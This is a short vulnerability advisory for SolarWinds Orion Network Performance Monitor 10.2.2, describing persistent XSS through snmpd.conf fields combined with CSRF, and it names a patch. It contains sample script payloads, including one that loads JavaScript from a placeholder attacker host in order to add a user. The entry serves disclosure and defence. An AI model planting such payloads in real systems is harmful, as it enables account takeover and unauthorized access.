vendor:
Orion Network Performance Monitor
by:
muts
8,8
CVSS
HIGH
Persistent XSS and CSRF
79 (Cross-site Scripting (XSS)) and 352 (Cross-Site Request Forgery (CSRF))
CWE
Product Name: Orion Network Performance Monitor
Affected Version From: SolarWinds Orion Network Performance Monitor 10.2.2
Affected Version To: SolarWinds Orion Network Performance Monitor 10.2.2
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012
SolarWinds Orion Network Performance Monitor 10.2.2 Multiple Vulnerabilities
SolarWinds Orion Network Performance Monitor (NPM) is vulnerable to persistent XSS when scanning a remote system containing malicious JavaScript in its snmpd.conf file. The vulnerable fields were determined to be: syslocation <script>alert('location')</script>, syscontact <script>alert('contact')</script>, sysName <script>alert('name')</script>. In addition, NPM is also vulnerable to CSRF attacks despite the fact that it makes use of VIEWSTATE protection. Through a combination of XSS and CSRF, a user can be added to the web application by configuring the snmpd.conf file to point to an attacker-controlled JavaScript file: syscontact <script src="http://attacker/evil.js"></script>
Mitigation:
SolarWinds has released a patch (10.3.1) to address the reported vulnerabilities.
